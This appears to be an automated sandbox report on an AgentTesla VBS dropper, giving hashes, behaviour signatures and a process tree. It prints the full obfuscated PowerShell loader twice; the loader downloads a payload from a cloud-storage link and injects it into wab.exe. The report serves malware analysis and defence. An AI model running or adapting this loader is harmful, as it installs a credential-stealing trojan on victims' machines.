Analysis

  • max time kernel
    147s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    18-06-2024 09:36

General

  • Target

    STS_Bunker_00617.vbs

  • Size

    92KB

  • MD5

    dfe2a23100ac3263583e69f48e9b32e6

  • SHA1

    20087641aba69eaaaef0f87a7d21edd8a255db60

  • SHA256

    9aa64f43d090ff657848da74a0c2ea1f3211fa1d88ac3fa603e65d724360a957

  • SHA512

    48b5bf8605415ead17d375adc9613b73f8e3f80132086f2a3ef11df7684e1d43ad4f97aee65967986a9964d81edcd7043d7faaf720fcd1f73052411d43153038

  • SSDEEP

    1536:V01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5eW8VLOExkzL:V09LB0DnWzhX7RXaSMxhxsAhWEwhrdMh

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle 1 "cls;$Scrotums = 1;$Bruta='ring';$Beelzebub='S';Function gigged($Gladden){$Hejsevrkets=$Gladden.Length-$Scrotums;$Maksimumstraffene=$Beelzebub+'ubst'+$Bruta;For( $Subarachnoidean=7;$Subarachnoidean -lt $Hejsevrkets;$Subarachnoidean+=8){$Brandering+=$Gladden.$Maksimumstraffene.Invoke( $Subarachnoidean, $Scrotums);}$Brandering;}function Alcaldes($Allograft){ . ($Afkortersav) ($Allograft);}$Mobilianer=gigged ' GetlinMLegitimo KobberzAkkill iAmadeuslYnkentrlTankrenaInforma/Styrtet5Trlkvin.Program0boy.ele Tinklin(bogudlaWTrykkeri SvmmehnDiskogrd kursisoAnabataw hotinisLejespa SkulptrNVermeskTNuancin comeba1Misdan 0mosel.v.Afklaps0B,kning;M.ggede filmkonW BilagsiSynartenDisinsu6 Ydervg4Cad.ish;Mate ia SengelxCata an6Usasunf4 Tempel;Papirar LycopsirSymmetrve dyson:Electre1 Coron 2Overswe1 T,unch.Afflict0,tivels)Inrig,e PrdispoGKaerligeScourwec InterckSov reioSulphet/Parison2 Wristb0Corn,ra1Skvadre0Unbehel0Be.gqvi1fack.ns0 Flagar1Termins Salg arF .orsttiTeko.perSheik reCoynessfWrongs,oIntercaxM,linge/ Ejendo1 Grinn,2Herutde1 Bldt.a. Jaunti0pachyhe ';$Returgodset=gigged 'SandsynUTamsvinsMyoprote Spiller Udspio-I.rksatAPlayaedgVilj kreGemmatinRe eceitProtohe ';$Hovedindgange=gigged 'Trimpreh P ojektmoonseetOver,lopAbdicers Udsu,e: Gatewo/ nfluer/ReklapsdEfter krOnio.skiFlgesedvU,mgngeeEtheri . LaplangPsykt.roCrabieroJewfishg VilloslCamoudieOceanw .FuscindcInactivoBetul.nmB.landr/ mul,iluPretenccPerikon?InsolubeAlcoholxAppendipRaceforolidokilrDopingdtLagerfo=,alrensd Bilf,boHjortetw ,uadranGodsendlSlvvrdioSees,wsaBittingdSerarh &OnonisviBrsspekdGavlvgg=Slu.bet1JustifiE Gan.hil .etallVgrfter,L S,adsa3SocialvptrinelycBlainsgSvagin,cdM,rsomefFremmanmUnoxidioHenkastM Popk mn witt.dWMakvr.eJSup.ame2Opsmnin- .ariferSlentre9papegjebpneumon- HarpikHPinballe Picks WSprogbat JapygiFR dningCStampubtdeoxi,aZNonio,i5,ibrere_Unscrut ';$Flyvevaabnet=gigged ' Dutch >Ph.toet ';$Afkortersav=gigged 'UnproviiLa inioeLystyacxPrecalc ';$Behagelige='Epithecium';$Krigssituationens = gigged ' tteaareDeclinecDeciduihNymph,noBilleds Camorri%VerrucuaSkurepupSolda,epTalarendMaitresaStandarttitu,eraEjendom% Lycop \FinansiCGenop oy LampwosFolkerotPonziteeNaumac nProgramcReallnshAflusniyMiekelimW andote stoc r.Cytostsa ForberaHallucinpatriar Uddykni&Pry.end& Ko.nek PuslingeMaremmacLekane hTyktarmo galiva Sadleplt.kovbyg ';Alcaldes (gigged ' ransfu$S,uglergAnorectlAgustemoconfuteb mutilaaAnhidrolVari bi: Hygsombunconsiy,emaaregPolkaernSkatkamiF.lmfornRestitugGri,hcrsDknavnerS rkproeTremmefgTangydilNsensabeDissimimSp,inkleFoelgenn HeltaltProbosceGrammatrUnarmednStrm.ore ChagrisLibert,=Virkeli(Guldf,sc tricy mRespittdPenname Dressi/PhysiotcPoin el Hvordan$ O,tpreK Impl,ar Disambi Don.tigSphenopsAmbulansUnthin,iYouthprtSlangetudioptraaUdtolketLikvidei ulfoetoSemifasn SteeraeovergesnIntranssFornrme)Dippene ');Alcaldes (gigged ' Parket$t rottlgForhandlTubfulsoBre dbobHer,kera ReprovlU,demon:ti,blivSAnskaf.pJernsbeeSen.elljSnoretrlEl iptikFactoria Jarid.bEcrufariu viklen ulfilmeThallict agfrertTidtag,e OrganorBalstyrn UnpropeDaybreasamurc.s=produkt$NonexclHskyldfloskyttegvBesk kkeBlas ogd NglelniEks,mennHmskodidCellulogAdfr,svaBov risnKoordingAvisereeFunktio.SquushisAk ariepSpejlgllOxyrhyniTaxamettForraad(Forehol$Tilv,jeF nitchilviderefyunderbuvBadevaneAr.angev Ro.aada Proctoareattirb S,ordrnIsohexyeTerroritAfhu,ni) Xanth. ');Alcaldes (gigged 'Chromop[ forpurNKom ureeRaakuldtInterre..epatomSL.calizeReteachrAffrontvHavnelbiRespecicp.rsonkeSipli.gPBalmorao J.rdvoiGuldfisnForkleltPlanlgnM Udkasta QuinibnSkeforsa eltiekgHysteroeM crolirOvertrk]Angreso:Alalusp:WudvagiSComprize Sc.phocSlappesuSclerotrMrk,ligiHandelst noneluyUndisobPBar iesrChaiseloSan,arat GrundfoLegehusc Oc.locoHyperpelAu,oinf noninfe=spagnuo Designv[UnpieceNpro euce S anestWorkpa...unicidSTushesse Deossic kiddoouCentralrUltima,iGulvtpptLuce.esyGnuerneP ,ubocarHijackeo KolonitHusl,jeoDomingtcMetermaoA,aiterlAfskrmnTbryllupyFranskmpTransube,laceab]Bag.ind: Phon.m:unipolrTJallsudlIsotopys,ompost1Palaeop2Overo.h ');$Hovedindgange=$Spejlkabinetternes[0];$Seducer223= (gigged 'Benaadn$ Tu.vedgBeake.zlUngridhoHanekrobblreb gaAfskedslMi.vsan:f.ntasitPr surmeStratifsReuttert SeriogsSh.lteriOpliverg Se,ncinforskrea Nonoptl Regelf= StopmtNKopierieadminicwFeriebo-FluoromOVo.rloobBadsdirjBrilleneRebbenecLykkelit Ludfat D sertiSdemicriyVandrinsSkri eatBl.delseAandsv m M.ondo. SejlfrNTilendee DraftetStrangu.Renum eWUnionizeKamt.kkbAnsatssCP asoidlCa pereiK rolineOsteoidnGinghamt');$Seducer223+=$bygningsreglementernes[1];Alcaldes ($Seducer223);Alcaldes (gigged ' romeme$PikningtKrigs,jeSpurreysBerndhut komplesAfmejesiFemor,cgPublicenSjlcomiaGibli.il Pickee.Struct.H AshmaneDomest,aTudendedBandaiteAgrodolrSalpe esJydepot[Oliv ri$DaftarpROino hoePrepdmitBogsamluscampinrLev ringFlobprooSyndsfodU.foressVarmep,eGhandictButt.rc]Trosive=D,walki$demoph MFabriksoSynkrotbMoolvieiProton,lSkoleraiSkurkesaKarak,enVerbalieDownstrrUnvola. ');$Lysregulering183=gigged ' ,gbomb$CajussutPerfecteRecensisBedsid tbe olknsrickettiMo.genfgBellmounBeramunamdomtollEjstrup. MachaiDUgestemoPyrophowSkandinnBilledflPrespecoProdu,taUn,arbldLysenehFReaumuriJazz,edlSandhedeObjektk(Tyredes$Sheri tHSi.kesnoVoldsomvNotedeseObtusildUpmounti nviolenTeledusdSpejlengButinfoa Hebre nUnfrolig OmstteeSnowsto, whigov$OfferlaR S,inulo N.nresuNonselegEburniahWo,ennehUligevgoForsideuKkkenmasDispurpe UdtalesForvari)Unp.rce ';$Roughhouses=$bygningsreglementernes[0];Alcaldes (gigged 'Overana$CreedalgIndkrsulFngetreoExcu atbSph.ngoa Hemoprl .hurch:TvrskibUClarisanfrontsoc Ro.anfu Fejl.arMeridiosRawishdiCatchxen larg sgPsychot=Bevari,( hysicT Las.voeFemogtyshakkekdt noreks-GkkensjPGraenseaViceco.t IldspahForklar byplads$DomssagR NordfaoSprjtehuProle ogProletahB,andymhPerspekoTopviewuArm.tols Angol.e Efte,ksprete,d) Termin ');while (!$Uncursing) {Alcaldes (gigged ' Rekt.o$ ,estilgStbeforlfl,gdagoArchsteb LaboraaAdoptiolKrystal:Lo,lygaOUnrot,npCognisilIrrestri Sel.erv Uforsvn,ondekniSi.kerhnFortrolgForme ns Romeos=Fry eli$KnoldentgardwurrTelefonu.lowshoeSili,ot ') ;Alcaldes $Lysregulering183;Alcaldes (gigged 'BatrachSShampontProgramabiklangr.etamertForsorg-DictyosSGrosgralPrjudiceSupersaeSt.machpMucigen Teddedg4Precon, ');Alcaldes (gigged ' Unwave$Negering.yggelilStinashoPe.sonabvi,jestaTerephtlPassan,:PaakldnUHjemka,nStrkbancrestlaguTtskrevrSummetosSkftni,iOmgaaelnAbscissg,rester=Astroph(Dyrek,eT KeelfaeOutd,insDesinfetOctod,c-Possi,lPUncomp,aLoasacetReklamehJournal Gen.pbl$MarplotRSubdir.oModbrplu Diri egUnlashehHoldundhTudkoppo FormasuHemimors FunktieGehngsos Hanker)Silicle ') ;Alcaldes (gigged 'S,rhatu$PugilisgPruderelVicuallo,rigittbSchokkeaTerti.mlPiedtak:hygiejnB wagnerrPolygonaAspargenEuroviscNovatiohD,ostyleRecipierDowieisnEnnoblee Epapop=Mafiam,$,ybdebogFusionslHandlinoFeltworbSmugkr aGluco ilKnoppen:KompottRCostbeneequalsiv Udlg.eoFenacetlPredetau VirtuatOverlbsijustifioTidenden Acat aiAdminisz B,drageInsa iemSanidineGra ddanLykkeskt ,harcusTar squ+Hostile+Fartjsf%Nyintro$ SidehnSElannorpTyrestaeVr.sttej .etninlFouragekForkbsraDesti eb UpturniTagdrypnSprgepae Korsikt Liste,tManualae fgretr Necropn Nonexte TongfisStran i.Udplukkc edpanboPukishnuWago.ern OrganitProg os ') ;$Hovedindgange=$Spejlkabinetternes[$Brancherne];}$Horsiness=315407;$Gaullists=29994;Alcaldes (gigged 'Dazzlin$Skud idgQuestiol Gryde,o Tyvek.bRomanilaBetalinlHumoris:Sedu,itBPremiereJugulard Remol oI.dlyseeAfgassem billotmNokkerteVulca is Dru.he Usleben=Reinars SuperaG St vnieBogs.avtResugg,-SnklodmCStaalvaoDy,efornFriherrt KejsereLon heanPapmlketAdminis Minefie$ EloqueR VandtioRessortu MundhegHjl.efihCa,orizhHemihedotriathluDirektos FjernveopflgnisHyrdebr ');Alcaldes (gigged ' A.jung$Bra,derg edenaglQuizzicoParti,lb KommeraSub roclKildesk:Neu ochl UnactpgUberygttTopsejlrChar lyeu,prosc L,tosol= Avantg Pa.sers[PlagiotSFo djelyBreib.ksReplenitlsgaaeneHolde im Tallin.F.edreuCUndervio MonoounMentionviteaceaeIndtastrFiltrattShahzad]Sprayda:Sigmoid:B.ttedeFCarabinrSkidtero,malgammUndescrBBoligpoaVolontrsAntis oe Hamito6Lionhoo4Das.tbuSFarvebatIndkaldrPigtraaiLutidinnwendykegThunder(Bastard$Pa,tomiBCharadee UheldidOfficieoElinguaeF.rretnm AfsvammBarrac e grnskisEfterk,)Statsho ');Alcaldes (gigged 'Museurt$Iltelegg Postcol,kridteoNonpassbLettilgaMaskottlf,stela:MetalizdBeflattiHumaneimBarbareiS.fetyanS oliatu Oestrat Bab lliHoresrev.onsensiFabrikaz Lo.snieUnhothys Fisker Tilsted= Skippe das rti[ResponsSDrejerey,dminissPl.teryt TillideUbeskytmGamene..S.ndhedTTalvrdieInd ragxforulemt,llotro.aendr fEMicroscnCat dvacRepl kkoBepraykd,ataniciPhenoplnBrakerog Pen,ui]Sandara: Regneb:NavigatAFarmakoSLunte aCSiru,shIneins,pIFedeka .DiacoelGregisteeHenvej.tStudielS llianctMacrotor DedoloiSilde.enAabenragC,ckshu(.rythem$Bagklogl R.ngbig,umultetVentricr IndlaeeVgenssc) Outlop ');Alcaldes (gigged 'P,ecere$Git esvgquasijulKonsuleoLang urb irkulra SammenlIkldtca:R,seredHShrewdya ExplornKaritasdBastku,s,iltypeo Kn.bbem HovedveAfs emmnHumanizeBobsldesBedragesBrudebu=Repenni$ CentradSpottiniAnarkosmLasso.ui schrodn AfhjlpuFlamme tSystemviW,ttishvFortovsiNat naezEuklidseIlkaphosNeutron. UdnyttsUlyksaluDrukmaabTand,ursFolkevatGiftstorRetversi manuranGlyco.igSkraast(M,dsige$OmhandlHCutes.koKo,tunnrHaarbrss Rosa.eiIl.ustrn.akenere Rinsu.sBit oensOutthro,Subvic $DagsproGMutabelaEne.ralu BlodtrlRetmssilDeterm,i Begonis Knowl,tSkf,nins olivil)Goads e ');Alcaldes $Handsomeness;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2828
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"
        3⤵
          PID:1604
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Scrotums = 1;$Bruta='ring';$Beelzebub='S';Function gigged($Gladden){$Hejsevrkets=$Gladden.Length-$Scrotums;$Maksimumstraffene=$Beelzebub+'ubst'+$Bruta;For( $Subarachnoidean=7;$Subarachnoidean -lt $Hejsevrkets;$Subarachnoidean+=8){$Brandering+=$Gladden.$Maksimumstraffene.Invoke( $Subarachnoidean, $Scrotums);}$Brandering;}function Alcaldes($Allograft){ . ($Afkortersav) ($Allograft);}$Mobilianer=gigged ' GetlinMLegitimo KobberzAkkill iAmadeuslYnkentrlTankrenaInforma/Styrtet5Trlkvin.Program0boy.ele Tinklin(bogudlaWTrykkeri SvmmehnDiskogrd kursisoAnabataw hotinisLejespa SkulptrNVermeskTNuancin comeba1Misdan 0mosel.v.Afklaps0B,kning;M.ggede filmkonW BilagsiSynartenDisinsu6 Ydervg4Cad.ish;Mate ia SengelxCata an6Usasunf4 Tempel;Papirar LycopsirSymmetrve dyson:Electre1 Coron 2Overswe1 T,unch.Afflict0,tivels)Inrig,e PrdispoGKaerligeScourwec InterckSov reioSulphet/Parison2 Wristb0Corn,ra1Skvadre0Unbehel0Be.gqvi1fack.ns0 Flagar1Termins Salg arF .orsttiTeko.perSheik reCoynessfWrongs,oIntercaxM,linge/ Ejendo1 Grinn,2Herutde1 Bldt.a. Jaunti0pachyhe ';$Returgodset=gigged 'SandsynUTamsvinsMyoprote Spiller Udspio-I.rksatAPlayaedgVilj kreGemmatinRe eceitProtohe ';$Hovedindgange=gigged 'Trimpreh P ojektmoonseetOver,lopAbdicers Udsu,e: Gatewo/ nfluer/ReklapsdEfter krOnio.skiFlgesedvU,mgngeeEtheri . LaplangPsykt.roCrabieroJewfishg VilloslCamoudieOceanw .FuscindcInactivoBetul.nmB.landr/ mul,iluPretenccPerikon?InsolubeAlcoholxAppendipRaceforolidokilrDopingdtLagerfo=,alrensd Bilf,boHjortetw ,uadranGodsendlSlvvrdioSees,wsaBittingdSerarh &OnonisviBrsspekdGavlvgg=Slu.bet1JustifiE Gan.hil .etallVgrfter,L S,adsa3SocialvptrinelycBlainsgSvagin,cdM,rsomefFremmanmUnoxidioHenkastM Popk mn witt.dWMakvr.eJSup.ame2Opsmnin- .ariferSlentre9papegjebpneumon- HarpikHPinballe Picks WSprogbat JapygiFR dningCStampubtdeoxi,aZNonio,i5,ibrere_Unscrut ';$Flyvevaabnet=gigged ' Dutch >Ph.toet ';$Afkortersav=gigged 'UnproviiLa inioeLystyacxPrecalc ';$Behagelige='Epithecium';$Krigssituationens = gigged ' tteaareDeclinecDeciduihNymph,noBilleds Camorri%VerrucuaSkurepupSolda,epTalarendMaitresaStandarttitu,eraEjendom% Lycop \FinansiCGenop oy LampwosFolkerotPonziteeNaumac nProgramcReallnshAflusniyMiekelimW andote stoc r.Cytostsa ForberaHallucinpatriar Uddykni&Pry.end& Ko.nek PuslingeMaremmacLekane hTyktarmo galiva Sadleplt.kovbyg ';Alcaldes (gigged ' ransfu$S,uglergAnorectlAgustemoconfuteb mutilaaAnhidrolVari bi: Hygsombunconsiy,emaaregPolkaernSkatkamiF.lmfornRestitugGri,hcrsDknavnerS rkproeTremmefgTangydilNsensabeDissimimSp,inkleFoelgenn HeltaltProbosceGrammatrUnarmednStrm.ore ChagrisLibert,=Virkeli(Guldf,sc tricy mRespittdPenname Dressi/PhysiotcPoin el Hvordan$ O,tpreK Impl,ar Disambi Don.tigSphenopsAmbulansUnthin,iYouthprtSlangetudioptraaUdtolketLikvidei ulfoetoSemifasn SteeraeovergesnIntranssFornrme)Dippene ');Alcaldes (gigged ' Parket$t rottlgForhandlTubfulsoBre dbobHer,kera ReprovlU,demon:ti,blivSAnskaf.pJernsbeeSen.elljSnoretrlEl iptikFactoria Jarid.bEcrufariu viklen ulfilmeThallict agfrertTidtag,e OrganorBalstyrn UnpropeDaybreasamurc.s=produkt$NonexclHskyldfloskyttegvBesk kkeBlas ogd NglelniEks,mennHmskodidCellulogAdfr,svaBov risnKoordingAvisereeFunktio.SquushisAk ariepSpejlgllOxyrhyniTaxamettForraad(Forehol$Tilv,jeF nitchilviderefyunderbuvBadevaneAr.angev Ro.aada Proctoareattirb S,ordrnIsohexyeTerroritAfhu,ni) Xanth. ');Alcaldes (gigged 'Chromop[ forpurNKom ureeRaakuldtInterre..epatomSL.calizeReteachrAffrontvHavnelbiRespecicp.rsonkeSipli.gPBalmorao J.rdvoiGuldfisnForkleltPlanlgnM Udkasta QuinibnSkeforsa eltiekgHysteroeM crolirOvertrk]Angreso:Alalusp:WudvagiSComprize Sc.phocSlappesuSclerotrMrk,ligiHandelst noneluyUndisobPBar iesrChaiseloSan,arat GrundfoLegehusc Oc.locoHyperpelAu,oinf noninfe=spagnuo Designv[UnpieceNpro euce S anestWorkpa...unicidSTushesse Deossic kiddoouCentralrUltima,iGulvtpptLuce.esyGnuerneP ,ubocarHijackeo KolonitHusl,jeoDomingtcMetermaoA,aiterlAfskrmnTbryllupyFranskmpTransube,laceab]Bag.ind: Phon.m:unipolrTJallsudlIsotopys,ompost1Palaeop2Overo.h ');$Hovedindgange=$Spejlkabinetternes[0];$Seducer223= (gigged 'Benaadn$ Tu.vedgBeake.zlUngridhoHanekrobblreb gaAfskedslMi.vsan:f.ntasitPr surmeStratifsReuttert SeriogsSh.lteriOpliverg Se,ncinforskrea Nonoptl Regelf= StopmtNKopierieadminicwFeriebo-FluoromOVo.rloobBadsdirjBrilleneRebbenecLykkelit Ludfat D sertiSdemicriyVandrinsSkri eatBl.delseAandsv m M.ondo. SejlfrNTilendee DraftetStrangu.Renum eWUnionizeKamt.kkbAnsatssCP asoidlCa pereiK rolineOsteoidnGinghamt');$Seducer223+=$bygningsreglementernes[1];Alcaldes ($Seducer223);Alcaldes (gigged ' romeme$PikningtKrigs,jeSpurreysBerndhut komplesAfmejesiFemor,cgPublicenSjlcomiaGibli.il Pickee.Struct.H AshmaneDomest,aTudendedBandaiteAgrodolrSalpe esJydepot[Oliv ri$DaftarpROino hoePrepdmitBogsamluscampinrLev ringFlobprooSyndsfodU.foressVarmep,eGhandictButt.rc]Trosive=D,walki$demoph MFabriksoSynkrotbMoolvieiProton,lSkoleraiSkurkesaKarak,enVerbalieDownstrrUnvola. ');$Lysregulering183=gigged ' ,gbomb$CajussutPerfecteRecensisBedsid tbe olknsrickettiMo.genfgBellmounBeramunamdomtollEjstrup. MachaiDUgestemoPyrophowSkandinnBilledflPrespecoProdu,taUn,arbldLysenehFReaumuriJazz,edlSandhedeObjektk(Tyredes$Sheri tHSi.kesnoVoldsomvNotedeseObtusildUpmounti nviolenTeledusdSpejlengButinfoa Hebre nUnfrolig OmstteeSnowsto, whigov$OfferlaR S,inulo N.nresuNonselegEburniahWo,ennehUligevgoForsideuKkkenmasDispurpe UdtalesForvari)Unp.rce ';$Roughhouses=$bygningsreglementernes[0];Alcaldes (gigged 'Overana$CreedalgIndkrsulFngetreoExcu atbSph.ngoa Hemoprl .hurch:TvrskibUClarisanfrontsoc Ro.anfu Fejl.arMeridiosRawishdiCatchxen larg sgPsychot=Bevari,( hysicT Las.voeFemogtyshakkekdt noreks-GkkensjPGraenseaViceco.t IldspahForklar byplads$DomssagR NordfaoSprjtehuProle ogProletahB,andymhPerspekoTopviewuArm.tols Angol.e Efte,ksprete,d) Termin ');while (!$Uncursing) {Alcaldes (gigged ' Rekt.o$ ,estilgStbeforlfl,gdagoArchsteb LaboraaAdoptiolKrystal:Lo,lygaOUnrot,npCognisilIrrestri Sel.erv Uforsvn,ondekniSi.kerhnFortrolgForme ns Romeos=Fry eli$KnoldentgardwurrTelefonu.lowshoeSili,ot ') ;Alcaldes $Lysregulering183;Alcaldes (gigged 'BatrachSShampontProgramabiklangr.etamertForsorg-DictyosSGrosgralPrjudiceSupersaeSt.machpMucigen Teddedg4Precon, ');Alcaldes (gigged ' Unwave$Negering.yggelilStinashoPe.sonabvi,jestaTerephtlPassan,:PaakldnUHjemka,nStrkbancrestlaguTtskrevrSummetosSkftni,iOmgaaelnAbscissg,rester=Astroph(Dyrek,eT KeelfaeOutd,insDesinfetOctod,c-Possi,lPUncomp,aLoasacetReklamehJournal Gen.pbl$MarplotRSubdir.oModbrplu Diri egUnlashehHoldundhTudkoppo FormasuHemimors FunktieGehngsos Hanker)Silicle ') ;Alcaldes (gigged 'S,rhatu$PugilisgPruderelVicuallo,rigittbSchokkeaTerti.mlPiedtak:hygiejnB wagnerrPolygonaAspargenEuroviscNovatiohD,ostyleRecipierDowieisnEnnoblee Epapop=Mafiam,$,ybdebogFusionslHandlinoFeltworbSmugkr aGluco ilKnoppen:KompottRCostbeneequalsiv Udlg.eoFenacetlPredetau VirtuatOverlbsijustifioTidenden Acat aiAdminisz B,drageInsa iemSanidineGra ddanLykkeskt ,harcusTar squ+Hostile+Fartjsf%Nyintro$ SidehnSElannorpTyrestaeVr.sttej .etninlFouragekForkbsraDesti eb UpturniTagdrypnSprgepae Korsikt Liste,tManualae fgretr Necropn Nonexte TongfisStran i.Udplukkc edpanboPukishnuWago.ern OrganitProg os ') ;$Hovedindgange=$Spejlkabinetternes[$Brancherne];}$Horsiness=315407;$Gaullists=29994;Alcaldes (gigged 'Dazzlin$Skud idgQuestiol Gryde,o Tyvek.bRomanilaBetalinlHumoris:Sedu,itBPremiereJugulard Remol oI.dlyseeAfgassem billotmNokkerteVulca is Dru.he Usleben=Reinars SuperaG St vnieBogs.avtResugg,-SnklodmCStaalvaoDy,efornFriherrt KejsereLon heanPapmlketAdminis Minefie$ EloqueR VandtioRessortu MundhegHjl.efihCa,orizhHemihedotriathluDirektos FjernveopflgnisHyrdebr ');Alcaldes (gigged ' A.jung$Bra,derg edenaglQuizzicoParti,lb KommeraSub roclKildesk:Neu ochl UnactpgUberygttTopsejlrChar lyeu,prosc L,tosol= Avantg Pa.sers[PlagiotSFo djelyBreib.ksReplenitlsgaaeneHolde im Tallin.F.edreuCUndervio MonoounMentionviteaceaeIndtastrFiltrattShahzad]Sprayda:Sigmoid:B.ttedeFCarabinrSkidtero,malgammUndescrBBoligpoaVolontrsAntis oe Hamito6Lionhoo4Das.tbuSFarvebatIndkaldrPigtraaiLutidinnwendykegThunder(Bastard$Pa,tomiBCharadee UheldidOfficieoElinguaeF.rretnm AfsvammBarrac e grnskisEfterk,)Statsho ');Alcaldes (gigged 'Museurt$Iltelegg Postcol,kridteoNonpassbLettilgaMaskottlf,stela:MetalizdBeflattiHumaneimBarbareiS.fetyanS oliatu Oestrat Bab lliHoresrev.onsensiFabrikaz Lo.snieUnhothys Fisker Tilsted= Skippe das rti[ResponsSDrejerey,dminissPl.teryt TillideUbeskytmGamene..S.ndhedTTalvrdieInd ragxforulemt,llotro.aendr fEMicroscnCat dvacRepl kkoBepraykd,ataniciPhenoplnBrakerog Pen,ui]Sandara: Regneb:NavigatAFarmakoSLunte aCSiru,shIneins,pIFedeka .DiacoelGregisteeHenvej.tStudielS llianctMacrotor DedoloiSilde.enAabenragC,ckshu(.rythem$Bagklogl R.ngbig,umultetVentricr IndlaeeVgenssc) Outlop ');Alcaldes (gigged 'P,ecere$Git esvgquasijulKonsuleoLang urb irkulra SammenlIkldtca:R,seredHShrewdya ExplornKaritasdBastku,s,iltypeo Kn.bbem HovedveAfs emmnHumanizeBobsldesBedragesBrudebu=Repenni$ CentradSpottiniAnarkosmLasso.ui schrodn AfhjlpuFlamme tSystemviW,ttishvFortovsiNat naezEuklidseIlkaphosNeutron. UdnyttsUlyksaluDrukmaabTand,ursFolkevatGiftstorRetversi manuranGlyco.igSkraast(M,dsige$OmhandlHCutes.koKo,tunnrHaarbrss Rosa.eiIl.ustrn.akenere Rinsu.sBit oensOutthro,Subvic $DagsproGMutabelaEne.ralu BlodtrlRetmssilDeterm,i Begonis Knowl,tSkf,nins olivil)Goads e ');Alcaldes $Handsomeness;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2756
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"
            4⤵
              PID:2700
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:596

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\Elysee.txt

        Filesize

        2KB

        MD5

        42f4cdaff599bf751294f7772ef38470

        SHA1

        22d0b54450fb80f14860ffa415c5d0b2d1074a3b

        SHA256

        2a8488b7b6eb1ce9702c196531a0335c9b399960f5d0d3f6892f87ef6d3f743a

        SHA512

        45edd484ada632eba0d48a716a591d975f9ad6d414faa6a996e09f810d06a5234d2dcd28ff49e3b8e96133e815f86e681f66b66cdb648461f8ce6a53b056a74c

      • C:\Users\Admin\AppData\Local\Temp\Elysee.txt

        Filesize

        3KB

        MD5

        ea02db7340e3f6e6b8e17308b6557be3

        SHA1

        4dded0ce59ba5daea1945ed6c818139aaf87478d

        SHA256

        7dce804a8697a14a7a3f373b752d8c27cfae9f594620cfb5b67a362d5f227a33

        SHA512

        45a1658ad9fb86ca758d384a875886bee1ffa77109a71a99db4f33198d53374c75f1093549d9b55c5f6830f04657a6ff2af1519ddadff6511298acced105f683

      • C:\Users\Admin\AppData\Local\Temp\Elysee.txt

        Filesize

        3KB

        MD5

        a0ffdcd45250b56ef7b6ece47dfaa18f

        SHA1

        af5079167ca7e43f73a3a65524016e12bd10b74e

        SHA256

        c72d2de94bcaf6f0b0413ea1457702e325285db25a33ad9e7a6c964fedc8cf43

        SHA512

        40d8db37fd09f130d8defa2f904b9521cd85b5f565ecbf9639c4f54d33f2fc5c5a8aea41e30a792837da60a3c224935c704c3b9daa441d0f47a798c443a038ec

      • C:\Users\Admin\AppData\Local\Temp\Elysee.txt

        Filesize

        4KB

        MD5

        2ac0d2e4dc51e1a2fac93883f392047d

        SHA1

        4b602734b7f0e8736f1687005362013ecf6adb7f

        SHA256

        d8aa74f29b5249196b19533d26963b3c5720f984c789ba88fa0ea7c84d4c1191

        SHA512

        02b0e47673ca66dba9c531108c91c1747e788e49140b9bc0f5a90635e4c2276a75a2b2ff35ad54f0bb34220f7233f2c1606e9f6e8b0c282e14201c4536a39ba3

      • C:\Users\Admin\AppData\Local\Temp\Elysee.txt

        Filesize

        1KB

        MD5

        ba9563f04617a88e57e8c5570fafa1f6

        SHA1

        16ccd5c12c2e93fccb354bf4655f624748cbc1f1

        SHA256

        273e078cfaa142cddf150b1bfc6787fb1db78532c0ab65e1a07b28c6e939c51b

        SHA512

        e86be586b76800ee0439d496a8529198048d14a5d57134c9569364e4022d9639214ec9f53ba8f7ae1a0c558a65b2539d116c205e7ffb1a5dedbb9b8c0cc5965e

      • C:\Users\Admin\AppData\Local\Temp\Elysee.txt

        Filesize

        2KB

        MD5

        dd21f671dea68ac7cd8bf939d4eeda94

        SHA1

